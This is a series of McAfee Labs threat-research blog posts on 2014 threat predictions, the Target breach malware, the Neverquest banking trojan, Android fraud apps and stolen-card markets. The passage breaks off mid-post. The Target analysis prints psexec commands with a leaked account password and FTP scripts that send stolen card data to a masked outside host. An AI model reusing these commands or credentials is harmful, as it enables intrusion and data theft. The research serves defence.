This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Toralv Dirro, Aditya Kapoor, and Cedric Cochin.

Many people are looking forward to the Internet of Things and how this trend can make our lives easier and more automated. But many don’t know what this means or how it already impacts us today. The idea behind the Internet of Things is that if people and many common objects in our daily lives were equipped with unique identifiers, then our computers could efficiently automate and manage these objects. Today there are many definitions, but central to all is the management of resources by computers, including mobile devices. To achieve this, these resources must be interconnected. And this is where we can see both benefits—and possible problems—for our lives.

Lots of devices already offer an intranet or Internet connection to make our dealings with them easier; just look at the average new television. Of course it works just fine connected to your cable, satellite, or aerial service. Now add a Blu-ray player and some TVs will automatically exchange information, adopt configurations, etc. For instance, the Anynet+ protocol will link your TV via a network cable or WiFi stick and download content from the Internet, while updating itself with the latest version. These are useful features, but they come with a risk. We have seen that attackers can exploit vulnerabilities in the set (basically it’s just a computer, running an OS and apps) to take over the TV and, for example, activate a built-in webcam. There are even alternate operating systems for some TV sets. If an attacker could take over a TV somewhere in a corporate network and use it to stage attacks on other machines, how would we ever suspect the TV could be the weak link? If this isn’t already happening as part of advanced attacks, we suspect it will occur in the coming year.

Vulnerabilities in Things extend much further than television. The European standard Meter-Bus (or M-Bus) was designed for the remote reading of gas and electric meters. Recently its radio variant, Wireless M-Bus, has gained a lot of popularity. The wireless aspect allows the remote management of lights, heating, electricity, alarm systems, and much more from a central unit using a special protocol. These systems have become affordable for home use and allow the owners to control appliances and other home services via smartphones and tablets over standard WiFi. Soon some houses will do away with keys to unlock doors and replace them with locks that use near-field communications or Bluetooth to identify the owners simply by their smartphones. Some Internet-connected locks will allow the remote locking and unlocking of homes, handy for letting in the house cleaner or the kids after school. What could possibly go wrong? For starters, if attackers can crack your home WiFi, they might easily open the doors to robbery attempts, without having to break in and attract undue attention.

The Internet of Things is still in its early stages. Yet we can foresee even more serious threats. Electric cars can now store and return electricity to the power grid. To do this, they will be connected to the home network and a smart meter, making remote attacks against a car and its systems (disabling brakes, etc.) much more feasible. We can also imagine potentially lethal remote attacks against medical devices such as insulin pumps. And these concerns don’t begin to touch the potential problems of various household or office devices updated by the “backdoor,” for good or ill, by their manufacturers.

In the coming years, having your ID stolen after a criminal compromises your home computer may seem a minor problem. Your security concerns will have to expand beyond traditional computing devices to make sure all networked objects are regularly updated and that you employ secure passwords.

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Craig Schmugar, Ryan Sherstobitoff, and Klaus Majewski.

Advanced threats

End users have more computing choices than ever before, from phones to tablets, desktops to laptops, but servers are a common hub for all these devices. Servers are also critical assets for corporations, governments, and even social circles. If attackers can penetrate these common cores of communication, they can reach many users’ systems and their data. Exploitation may come via a poorly configured system, weak credentials, or service or application vulnerabilities. Once a foothold has been established, criminals can use further advanced tactics to conceal their tracks and evade many forensics analysis techniques. In the year ahead we anticipate a heightened focus on this avenue of attack.

Traditional malware installs on a victim’s machine to allow it to execute each time the system boots. Rootkits subvert the operating system to conceal and or resist the detection and removal of the threat. Next year we will see a shift away from this model in several ways.

• Self-deleting malware will cover its tracks by removing all traces of payload files from the operating system, leaving code to execute in memory. Most of the time this is sufficient for a threat to do its damage, whether stealing user credentials, encrypting data files, or a host of other nefarious activity.
• Memory-only attacks don’t need initial executable code to hit the disk, but rather exploit applications already running to perform the same types of functions.

These two methods may be fueled by the increasing popularity of Connected Standby hardware and software, namely Intel Haswell processors and Windows 8, which encourage users to shut down their systems less often due to power consumption optimizations. Plus, servers are rarely rebooted, making them a prime target for such techniques. We anticipate an increase in two further threats:

• Using “off-box” persistence, attackers can maintain a stronghold on a victim’s machine without leaving traces for traditional file antivirus products to discover.
• Parasitic Trojans infect an existing host file, which is more likely to remain unnoticed.

Advanced persistent threats burrow into government or organizational networks and remain dormant, sometimes stealing data but also waiting for the right moment to attack. In 2014 these attacks will become more targeted in nature and will focus more on individuals to gain access to networks. We will also see the weaponization of malware and an increase in destructive cyberterrorism and government-on-government cyberwarfare. Adversaries will use a number of evasion techniques to become more effective in penetrating their targets with a mix of zero-day vulnerabilities customized to their victims’ environments. We will see greater innovation used by attackers as the security industry reveals their techniques and tactics.

Advanced evasion techniques

Cyberattackers use various evasion techniques to manipulate network traffic so that network defenses such as firewalls, intrusion prevention systems, and breach detection systems do not detect exploits that are part of the traffic. The technique was in play by 1998, and evasions still work extremely well. From a hacker’s point of view, an evasion is a transport mechanism that can silently pass any kind of exploit through a network’s defenses without raising an alarm. Advanced evasion techniques combine single evasions with complex combinations. We have discovered more than 450 single evasions, and the number of combinations is at least as high as there are different kinds of computer viruses in the world.

Advanced evasion techniques are one of the biggest unsolved problems in the network security industry. Customers and vendors downplay their importance because they either do not believe in them or they do not have a way to remediate them. (To learn more about AETs, download McAfee Evader, an automated evasion testing tool, and read the report that SANS did with the Evader.)

We predict that in 2014 hackers will use advanced evasions especially to exploit old vulnerabilities. How is that possible? Haven’t old vulnerabilities been patched? They have been by most consumers and organizations that use automatic or regularly scheduled updates, but we still find old machines that cannot be patched in industrial control systems and factory environments. Many of these control systems can be patched only once a year during an annual maintenance break; others run operating systems so old, such as Windows NT, that there are no more patches for them. Security administrators routinely use network protection devices to shield those systems against exploits, but advanced evasion techniques silently bypass those devices. Industrial control systems are used in all manufacturing sites, in energy production, and in critical infrastructure. We expect to see more activity against these sites in the coming year.

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Bing Sun, with assistance from Andy Cheng, Yingwu Han, Haifei Li, Qiang Liu, Shennan Wang, Jun Xie, Chong Xu, and Stanley Zhu.

Our research into threats to networks and applications shows us three top targets of malware developers. They aim zero-day and advanced persistent threat attacks against vulnerabilities in Microsoft Internet  Explorer (including IE plug-ins and ActiveX), Adobe applications (including PDF and Flash), and Sun’s Java. We also see vulnerabilities in Microsoft Office applications and other Windows native components (such as GDI +, the kernel module, and drivers) exploited in the wild. These targets are favorites each year for attackers, so it’s not hard to predict where they will look in 2014.

• Browsers will remain the primary target for remote code execution attacks. Browsers have a range of factors that can be leveraged for exploitation, such as third-party plug-ins and various scripting-language support.
• The prevalence of vulnerabilities in Adobe applications will increase, perhaps related to source-code leakage. Adobe product vulnerabilities, especially in Flash, are often used in conjunction with other application vulnerabilities (in browsers, Office, etc.) to bypass protections.
• Java vulnerabilities and exploits, either of the Java virtual machine or native component layer, will remain very popular. Compared with memory corruption issues, Java exploits don’t require a shellcode-like payload; thus they are more reliable and easier to make. Although Java enhanced its security in Version 7.0—a security alert will prompt users before running any unsigned applet, for example—many users will choose to disable the alert to avoid the noise. Moreover, we suspect many Java users still use old or unsupported versions due to compatibility issues with legacy Java apps or simply bad habits. This would explain why so many old Java vulnerabilities are still actively exploited by exploit kits.
• Attackers will continue to find holes in Office. Our analysis of the recent Office exploit CVE-2013-3906 (TIFF embedded in .docx) reminded us that Office documents employ a compound-document format that is designed to allow many other types of content (such as OLE objects). Such a rich set of features, some perhaps unknown or hidden, will inspire attackers to find new weaknesses in these applications. From this exploit, we know that a Word document can embed a number of ActiveX binaries to do heap sprays, and can load an incompatible module (VB6) to completely disable data execution prevention for the entire process.
• Kernel-mode elevation of privilege vulnerabilities will be widely exploited in combination with other application vulnerabilities to achieve both temporary and persistent infections. As we see in Microsoft’s Patch Tuesday security bulletin data, there are often new patches for kernel-mode vulnerabilities, notably in the GUI subsystem (win32k.sys). Kernel-mode issues accounted for roughly one-quarter of all Microsoft product vulnerabilities in 2013. Considering the complexity of kernel-mode components, we can foresee that the number of kernel vulnerabilities of 2014 will be at least as high as in 2013.

To add to our worries, exploits have become more advanced in their reliability, persistence, and ability to bypass various protections. Further predictions:

• Native operating system and application protection mechanisms are not adequate to detect and stop advanced exploits. Attackers will increase their efforts to break these defenses in 2014. Although both OS and application vendors have made many security improvements, attackers can always find new ways to create reliable exploits, which was well demonstrated in the 2013 Pwn2Own hacker contest. For example, the combination of data execution prevention and address space layout randomization can be easily defeated by memory information leaks and return-oriented programming.
• Many exploits are now aware of the existence of network and endpoint security software. As we have observed during our research, the trick of API hook hopping has become a standard weapon of advanced shellcode to prevent its execution from being monitored. We have seen this technique in wide use, especially in zero-day exploits. We expect exploit tools such as Metasploit Framework and Canvas may soon add this feature.
• Many applications have implemented “sandbox” solutions to confine malicious behaviors in a restricted environment to minimize their impact. Office, Adobe Reader, and Google Chrome each have a sandbox implementation. To break out of an application-level sandbox and do malicious things to a whole system, an attacker will have to use more than one vulnerability and achieve a multistage exploitation. An elevation of privilege vulnerability can help an attacker escape from the sandbox and install malware on the compromised system. Here’s where a kernel-mode vulnerability will come in handy because it can let an attacker run code in Ring 0. We expect more attackers to take advantage of kernel exploits to escape application-level sandbox products.
• We believe exploits (especially zero day and advanced persistent threats) will soon evolve to include features that defeat sandboxing. First, exploits will become stealthier, especially during the postexploitation stage. They will try to leave as few footprints as possible because sandbox detection relies heavily on postinfection behaviors to identify an attack. Further, more exploits will begin to detect or even escape from a sandbox. Although the latter seems difficult, it is possible.

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Adam Wosotowsky.

Botnets

Botnets come and botnets go, but we can be certain they will continue to plague us in the coming year. Botnets that send spam are again on the rise; spam volume in 2013 increased to levels we had not seen since 2010.

Support for Windows XP ends in April, so it would be natural for attackers to target this OS even more because Windows XP’s market share is likely to remain high for a while. We are also likely to see more zero-day attacks targeting vulnerabilities in XP to establish bot clients for sending spam or other uses.

Botnets will take part in more targeted attacks. We have already seen espionage supported by Travnet, which targeted governments of various countries. Next year we’ll see botnets used as a platform to launch attacks on industry-specific infrastructure such as medical devices, SCADA manufacturing systems, military organizations, smart chips, ATMs, banking, etc.

The biggest attraction of botnets—making money—will likely lead to an increase in interest in digital/virtual currencies such as Bitcoin mining. “Botnets as a service” will extend to areas in addition to their use in spamming, denials of service, and so on.

This year we observed a lot of botnet and Trojan (for example, Carberp and KINS/PowerZeus) source code leaked in public forums. We expect to see more and more variants of current botnets as attackers modify today’s source code to create and sell their own bot kits.

There will also be an increase in the sophistication of botnets. We are likely to see several developments:

• Advanced cryptography and custom encryption in communications with control servers
• Code obfuscations to prevent detection and reverse engineering
• Hardware-locked malware that runs only on a specific system after infection
• Sandbox/environment awareness that prevents the creation of automated antimalware signatures

With the smartphone and tablet markets increasing at a rapid rate and more organizations adopting “bring your own device” policies, we are likely to see the emergence of mobile-based botnets. Further, we expect more of JavaScript Blacole–related campaigns affecting mobile apps.

Spam

We have recorded large growth in affiliate-marketing spam during the past few years. With this type, spammers send unsolicited advertising from legitimate companies to purchased email lists of customers who have not opted in to receiving the advertising yet are not capable of opting out. According to the CAN-SPAM Act, this sort of behavior leaves both the marketer and the client company liable for these spam activities, and the unrelenting nature of these campaigns often leads to the publicizing of companies using these sorts of marketers to force them to stop. We still need more international cooperation to get countries to agree on a basic definition of spam and adopt best practices for handling entities that send unsolicited email to purchased lists.

“Snowshoe” spamming, which uses many IP addresses to send as much spam as possible before the addresses are blacklisted, for the most part in 2013 targeted common two-letter top-level domains such as .us, .in, and .uk. This year we may see other two-letter TLDs such as .la (Laos) and .me (Montenegro, for foreign-language mails) as prime targets. Some, such as .la, are already promoting casino spam. Overall we could see more two-letter TLDs used in spam mails.

Penny stocks, loan offers, and “pump ’n’ dump” spam enjoyed a resurgence in 2013 after disappearing for a few years. As the stock market euphoria continues, small investors will be vulnerable to this type of scam. In past years these sorts of email campaigns stayed around until the perpetrators were arrested, which is likely to be the case again.

With the means for monetizing botnets growing more diverse, we expect to see an increase in spam coming from web servers compromised through PHP/MySQL remote exploits. Today we find mostly pill spam (pharmacy offers) generated through these attacks. Each year the number of web pages that haven’t been maintained with up-to-date libraries increases, which offers a growing number of sources for delivering spam, phishing, and malware to victims.

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Christoph Alme, Paula Greve, and François Paget.

In spite of advanced attacks of various types, malware, and other concerns, the web remains the primary threats vector. Whether we browse via Android, iOS, Windows, Mac, or other means, free open-source analytic tools can allow almost anyone to learn too much about us and use that information to entice us “click that link.” We have learned to avoid many of these temptations, but two things remain true in security: As features evolve, new threats are quick to arise; and as we adapt detection and takedown capabilities, the bad guys are just as agile in adapting their methods. We anticipate an increase in threats next year in three main areas: HTML5, exploit kits, and “free” software.

The biggest story in feature evolution is HTML5, which allows websites to come alive with interaction, personalization, and rich capabilities for programmers. But HTML5 also allows a significant number of new ways to snoop on users and exploit the system. Using HTML5, researchers have already shown how one could identify a user’s browser history to better target ads. Once the HTML5 adoption is complete, we expect to see similar abuses of HTML5 to enable access to the device—breaching the browser sandbox. With the spread of “app friendly” devices—and HTML5 embedded not just in web pages but within the apps as well—hackers will gain as much access to a user’s world as they could desire. We expect HTML5 abuses to become as commonplace as any of the exploit kits will allow.

Speaking of exploit kits, this past year showed us that they are the best tool for infecting users’ machines. We expect that the bad guys will continue to invest in the development and sharing of kits such as Blackhole. As the security industry continues to better detect and respond to newly registered domains set up for a malicious purpose, the criminals will focus efforts on evolving exploit kits to successfully insert malicious code and redirection components into legitimate web sites. Given the dynamic nature of content hosting, short URLs, and dynamic page content, these infected pages may have a longer time to live and become more valuable to attackers. Thus we will see continued evolution of attacking not only the browsers, but the servers as well.

In 2014, users and administrators will face a greater challenge from “free” products. Some say if you don’t pay for a product, you are the product. We have become accustomed to getting awesome apps—for free—with excellent features that make our lives easier—for free—and even security services—for free. But all of these services and apps cost money, and their developers must pay for them by selling ads, selling our information, or making us buy other things. This need has led to significant shades of gray between “information-stealing malware” and “making-our-lives-easier utilities.” In the security industry, we already see increased pressure from developers to reclassify their potentially unwanted programs and adware as legitimate software. During the course of 2014, an event (data breach, data leak, a company using customer information just a little too broadly) will occur that will make the public fully aware of how much of their data is exposed and could be inferred. This event and its fallout will challenge some of the freemium models that society has come to expect–and waking up the general public to how much of a “right” they have to fully understand and control their “big data footprint” and what conveniences they would be willing to give up to make it smaller.

Our desire for more and better features exposes us to greater risks, more open-source options help not just developers and researchers but also cybercriminals, and convenience and cost battle with privacy and security. In 2014 we will see the full impact of these tradeoffs.

In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story’s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.

Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums. Related samples to date are somewhat similar in function to (and possibly derived from) known “BlackPOS” samples.

Sample Information/Sources

• ce0296e2d77ec3bb112e270fc260f274–ThreatExpert (cache)
• F45F8DF2F476910EE8502851F84D1A6E–ThreatExpert (cache)
• 7f1e4548790e7d93611769439a8b39f2–VirusTotal
• 4d445b11f9cc3334a4925a7ae5ebb2b7–VirusTotal
• 762ddb31c0a10a54f38c82efa0d0a014–Virus Total
• c0c9c5e1f5a9c7a3a5043ad9c0afa5fd–VirusTotal

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.

Possible Actor/Attribution Data

Both uploaders contain the following string (compile path)

• z:\Projects\Rescator\uploader\Debug\scheck.pdb

Rescator is a known actor in various cybercrime forums:

Data Collection and Transfer

Data is collected and transferred to internal shares via the following command syntax:

• c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r cmd /c “taskkill /im bladelogic.exe /f”
• c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r -d bladelogic
• c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\10.116.240.31\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt
• c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt

“ttcopscli3acs” is reportedly a Windows domain name used within Target stores.

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:

——————————————
open xxx.xxx.xxx.xx

%name%

%password%

cd public_html

cd cgi-bin

bin

send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_%_%_%%_%%.txt

quit

——————————————

Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.

——————————————
open xx.xxx.xxx.xx

%name%

%password%

cd 001

bin

send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt

quit

——————————————

——————————————
open xx.xx.xxx.xx

%name%

%password%

cd etc

bin

send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt

quit

——————————————

Compilation Dates

• 762ddb31c0a10a54f38c82efa0d0a014 – Sat Nov 30 17:52:00 2013 UTC
• 4d445b11f9cc3334a4925a7ae5ebb2b7 – Sat Nov 30 17:21:17 2013 UTC
• c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – Tue Dec  3 00:15:01 2013 UTC
• 7f1e4548790e7d93611769439a8b39f2 – Sat Nov 30 17:38:23 2013 UTC

This post is the last in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Craig Schmugar.

Renewed interest in small-office and home-office router hacking, and an uptick in successful exploitations will lead to an increase in WiFi hotspot–related threats. This threat vector will lead to more cross-platform attacks. Public access points are especially worrisome because any system on the network can be impacted by an infected computer that had previously connected to the same hotspot.

With the increasing versatility of Internet-connected gaming consoles, the chances of randomly downloading malware while browsing or installing an app is also increasing. Fueled by the releases of the Microsoft Xbox One and Sony PlayStation 4 in 2013, we expect to see attacks on these platforms grow in proportion with their adoption.

A new banking Trojan in the news, known as Neverquest, is active and being used to attack a number of popular banking websites. This Trojan can identify target sites by searching for specific keywords on web pages that victims are browsing. After infecting a system, the malware gives an attacker control of the infected machine with the help of a Virtual Network Computing (VNC, for remote access) and SOCKS proxy server. The Trojan targets several banking sites and steals sensitive information such as login credentials that customers enter into these websites. The Trojan also steals login information related to social networking sites (listed in the configuration file) like Twitter, and sends this information to its control server.

Once it infects a system, the Trojan drops a random-name DLL (for example, cjekvxk.dat) with a .dat extension in the %APPDATA% folder. The Trojan then automatically runs this DLL using regsvr32.exe /s [DLL PATH] by adding a key under “Software\Microsoft\Windows\CurrentVersion\Run\.” The Trojan tries to inject its malicious code into running processes and waits for browser processes such as iexplorer.exe or firefox.exe. Once the victim opens any site with these browsers, the Trojan requests the encrypted configuration file from its control server, as we see in this screenshot:

The Trojan generates a unique ID number that will be used in subsequent requests. The reply is encrypted with aPLib compression. The reply data is appended to an “AP32” string, followed by a decompression routine, as shown:

The configuration file contains a huge amount of JavaScript code, a number of bank websites, social networking websites, and list of financial keywords. The JavaScript code in the configuration file used to modify the page contents of the bank’s site to steal sensitive information. Let’s look at the configuration file:

The Trojan targets financial institutions including Bank of America, CitiBank, and many others. Here is a list of target sites found in the decrypted configuration file:

The Trojan asks for sensitive information by modifying the page contents that a victim visits. The configuration file also contains a list of social networking sites and a list of keywords related to banking:

If the Trojan finds any of the keywords on a web page, it will steal the full URL and all user-entered information and sends this data to the attacker:

The Trojan sends a unique ID number followed by the full URL containing username and password. (We’ve entered fake information to capture the logs.) The Trojan also sends all web page contents compressed with aPLib to the attacker in the following format:

The Trojan steals information entered on social networking sites listed in the configuration file and can use that data to further spread the malicious code:

The Trojan keeps on stealing new data and updating its configuration file. The attacker uses a SOCKS and VNC server to carry out malicious activities. Here is a snapshot of strings we found:

The Trojan can steal SMTP (Simple Mail Transfer Protocol) and POP (Post Office Protocol) credentials from email clients. It can also steal FTP login credentials from various programs that can be used to distribute the malicious code:

We have also found an updated configuration file that contains code to request additional JavaScript files targeting financial sites such as BMO (Bank of Montreal), PayPal, RBC (Royal Bank of Canada), and others from a different malicious server. The malicious server has several web panels for collecting sensitive information from different financial sites–which shows attackers are learning and creating new fake pages for new sites. The JavaScript code:

The preceding JavaScript code is displayed in the victims’ browsers if they visit these sites. There are many banking Trojans, but Neverquest has more capabilities than most. Attackers can hide their tracks with the help of proxy and remote control and can carry out transactions from the infected machines. The Trojan can search for new banking sites with the help of financial keywords listed in the configuration file. The Trojan can also steal new banking URLs and their page contents, which eventually update its configuration file. In this way Neverquest can grow its target database to carry out future attacks.

I would like to thank my colleague Vikas Taneja for assistance with this research.

The post Neverquest Banking Trojan Uses VNC, SOCKS in New Threat appeared first on McAfee.

Last year we saw an attack targeting Android device users in which more than 2,400 malicious one-click fraud apps were published on Google Play in Japan. The attack has calmed down since October 2013, but it seems the scammers are still looking for opportunities to victimize smart device users in Japan.

As we enter 2014, McAfee has again discovered suspicious apps on Google Play in Japan. These apps lead users to malicious one-click-fraud websites. Ten apps have been published under one developer’s account, and the total number of downloads amounts to at least 5,000 as of this writing.

Figure 1: Suspicious apps lead users to malicious one-click fraud sites.

Unlike many apps discovered last year that simply displayed fraudulent websites, these new apps look harmless and behave just as adult image viewer applications. However, they enable a push notification from the attacker’s server based on GCM (Google Cloud Messaging) after their installation. The attacker can at any time send a push notification message containing a URL to a malicious one-click-fraud site, and users are sent to these risky sites via a browser once they tap on the message displayed on the system notification bar.

Figure.2: The apps implemented as an adult image viewer.

Figure.3: Push notification messages that lead users to a malicious one-click-fraud site.

The notification message is pushed once or twice per a day, and the destination URLs include not only one-click-fraud sites but also fraudulent adult dating service sites. Because this notification message is displayed even when the apps are not active and the origin of the message is intentionally undisclosed, it can confuse users in many cases and expose them to risks.

McAfee already reported Android/BadPush.A last year. This malware leads users to fraudulent adult dating services using push notification messages.

McAfee Mobile Security detects these newly found apps as Android/BadPush.B.

Tricking users into visiting one-click-fraud sites is not limited to Android apps on Google Play. Android adult apps on unofficial websites can also do this.

Figure.4: Examples of unofficial apps that lead users to one-click-fraud sites.

We have also confirmed that the scammers are tricking users on many Japanese blogs related to adult contents, as well as on Twitter, LINE, Kakao Talk, and others. Because these attacks are web-based, not only Android device users but also iOS device users should be careful.

Figure.5: Tweets that lead users to one-click-fraud sites.

Fig.6: A LINE message that leads users to one-click-fraud sites.

Figure.7: A Kakao Talk message that leads users to one-click-fraud sites.

McAfee Mobile Security detects this kind of Android app related to the scam activities as a variant of Android/OneClickFraud, and also blocks web browser access to such one-click-fraud sites on Android.

Although we can’t be sure that an attack on Google Play like last year’s will happen again, we can easily imagine that one-click scammers will continue to look for careless victims, lead them to malicious sites, and trick them into paying money using various tactics.

As always, users should ignore any approach from and payment request by scammers even if the users accidentally visit fraudulent websites and register for these services.

The post One-Click Scammers Still Targeting Japanese Smartphone Users appeared first on McAfee.

Headlines for January have been dominated by revelations of one retailer after another suffering from enormous breaches of personal, and financial data.  From the 18^th of December 2013 when news of the Target breach were publicly disclosed, to Neiman Marcus the cumulative loss runs into the many tens of millions.  At McAfee Labs we provided analysis into the Point of Sale (PoS) malware used for the Target breach which answers one of the key questions; namely how were attackers able to intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data.  Another question however is the net result of so much data flooding the underground economy.

In Q2 2013 we published the whitepaper entitled ‘Cybercrime Exposed’ whereby analysis of the broad nature of cybercrime products, tools and services were presented.  One of the categories within the White Paper was ‘Hacking-as-a-Service’ in which the end-customer of the cybercrime could simply purchase products such as credit cards.  The indicative prices are presented below:

Whilst the prices may have been relatively accurate in the summer of 2013, the reality is that as a direct result of recent breaches, the prices for large volumes of credit cards have plummeted significantly.   With newer dumps of card data related to recent breaches appearing with alarming regularity, the ‘over’ supply of cardholder data is clearly impacting prices.  This is demonstrated in the recent dumps entitled “Eagle Claw 1” and “Eagle Claw 2”, shown in the below screenshots.  “Tortuga” is a little older:

Please note that specific information in the screenshot have been intentionally obfuscated.  This of course is only one of many dumps available, earlier examples include Tourtuga and Barbarossa.  As the below example demonstrates the prices do appear to be falling as more card data floods the marketplace:

As of January 31, the pricelist for CC Dumps and Cards ranges from 2.00 USD to 85.00 USD depending on geography and completeness of data (CVV2 inclusion).

Note that in addition to accepting Bitcoin, this site (and others) also accept Web Money, Lesspay,  Western Union and MoneyGram.  In our recent research paper entitled ‘Digital Laundry’ we reviewed the role of virtual currencies within cybercrime.

To further illustrate the pricing, here are some current listings on Carding forums/markets that are not affiliated with the Lampeduza Republic:

Compare this to prices from January 2011:

We should of course not be surprised, and these examples are just a small tip of the iceberg.  Also, whilst price reduction is just one impact, forums and their participants are demonstrating significant frustration at the disclosure of these breaches.  The below excerpts show recent commentary from within the community directed at a notable, independent, security researcher:

Note the spelling of “картонко” above.    You’ve seen this before if you have been following all the news around the retail POS issues.   In this context it’s referring to cards (aka credit cards).

Selling data, CC Numbers, and other financial jewels is not all that is available in these forums/markets/communities.  Many provide a full service.   It is not uncommon to also be able to acquire specific software ‘tools of the trade’ or the services of those that will use said tools for you so as to distance yourself (or your customer) from some of the risk.

Some examples:

Tools:

• General malware
• Keylogging and Backdoor Trojans (kit and ready-made)
• Crypting / Packing Tools
• Scripts / Probes / Scanners
• Brute force scripts (tailored to specific accounts, i.e. Paypal)
• Cameras, Skimmers, and other hardware solutions
• RFID & NFC Tools

Services:

• Education / Classes (Carding tools, lingo, POS and Banking software)
• Escrow and Anonymity Services
• Tool and Exploit development
• Shipping services (stealth and anonymous)
• Currency “conversion”
• CC and CVV Verification
• ID and Passport Creation
• Email / SMTP services (including flooding / DoS)
• VPN
• Reverse engineering
• Decryption (ex: password cracking, etc)
• Printing and Embossing

With further revelations hitting the media on a daily occurrence we can expect to see the supply of stolen data for sale to increase, and ultimately a further decrease in the prices offered.  Moreover, as we documented in the CyberCrime Exposed whitepaper the technical bar required to become a cybercrime has never been so low, indeed all that is required to be a cybercrime is access to the internet.

The post New Year’s Sales; Big Discounts on Stolen Data appeared first on McAfee.

Somewhat controversial websites or apps called chat friend finders, or ID BBS (Bulletin Board System) are spreading widely in Japan. They allow users of well-known communication services like LINE and Kakao Talk to make friends with others by publishing profiles and service IDs, yet without disclosing real phone numbers and email addresses. Such sites and apps are not officially supported by the service operators and are usually discouraged, due to the potential danger. It appears that some users are being involved in crimes caused by criminal “friends.”

McAfee Labs has recently found suspicious chat friend finder apps on Google Play that target Android device users. These apps allow users to register and publish their IDs for several well-known communication services but at the same time secretly leak personal information such as phone numbers and Google account names (Gmail addresses in most cases).

Figure.1: Chat friend finder apps on Google Play that leak personal information.

Some of these apps seem to mainly target Japanese users because they support a Japanese interface, as well as some other languages, and also support a Japanese-specific communication service like Mixi. On the other hand, we guess that the apps were created by Korean-speaking developer(s) because the Japanese is sometimes unnatural and we can see Korean chat messages. Plus, the common server used by all of these apps appears to be located in South Korea, according to its IP address.

The contents of the apps description page on Google Play look as if they were copied and pasted or reused from similar Japanese apps with slight modifications. For example, the page says users should accept the terms and conditions in the app’s dialog box at initial launch–yet there is no dialog box. We doubt these apps are carefully or securely designed.

Figure.2: An example of a dangerous chat friend finder app.

One of these apps allows users to publish their service IDs for LINE, Kakao, Mixi, and Skype as well as profile information like photograph, nickname, gender, and residential area. These pieces of information are disclosed to other users on the apps, enabling one to approach or to be approached by others. The apps also support chatting.

However, these apps secretly send users’ phone numbers, email addresses (Google account name), IMEI, and SIM serial numbers to a server managed by the app developer. Clearly, there is higher risk in storing personal information like phone numbers and email addresses in a form associated with various service IDs, public profile information, and chat contents than in storing that data separately. Once this data is leaked, malicious parties can approach specific users using their phone numbers or email addresses, and knowing the victims’ preferences or activities in various communication services.

The secretly collected personal information and its association with various IDs and user profile information are not disclosed to users. As always, there are risks that security vulnerabilities in the apps or their data management server could cause the information to leak to malicious third parties.

Figure.3: Chat friend candidate list and user profile registration screens.

At installation these apps request many kinds of permissions. These requests seem excessive for the functions of the apps. The dangerous information leak is related to only two requests: READ_PHONE_STATE and GET_ACCOUNTS. The remaining requests appear to be used by ad modules in the apps or may be unused.

Users should be very careful about permissions requested by Android apps, and also confirm that the app provider is trustworthy before providing any permissions.

Figure.4: These apps request many kinds of permissions.

Using chat ID BBS sites or apps, even without information leaks, is dangerous. These new apps will expose careless users to much higher risks of having their personal information associated with anonymous IDs and various messaging services. If users really want to use chat ID BBSs, we recommend that they visit simple websites rather than use apps to prevent unnecessary information leaks.

McAfee Mobile Security detects these suspicious apps as Android/ChatLeaker.F.

The post Chat Friend Finder Apps on Google Play Leak Personal Information appeared first on McAfee.

Malware related to short message services occupies a large portion of today’s Android malware families. These include premium SMS fraud and SMS spying. Such SMS-based malware apps are actively distributed via unofficial or malicious app stores, but it is rare to find them on Google Play, the world’s largest official Android app store. Nonetheless, we have recently seen SMS Trojans on Google Play.

McAfee has found on Google Play two adult-oriented apps in Vietnamese that download a malicious SMS Trojan app impersonating RealPlayer. The malware comes from a remote server and persuades careless users to install and activate it as a DeviceAdmin app.

Figure.1: Malicious apps on Google Play that download an SMS Trojan.

These apps look like adult-content viewers, yet at installation they request excessive permissions that are unnecessary for this kind of viewer app.

Just after launch, they show a dialog offering to download the latest RealPlayer app for viewing adult movies in HD resolution. The malware downloads RealPlayer.apk if the user accepts.

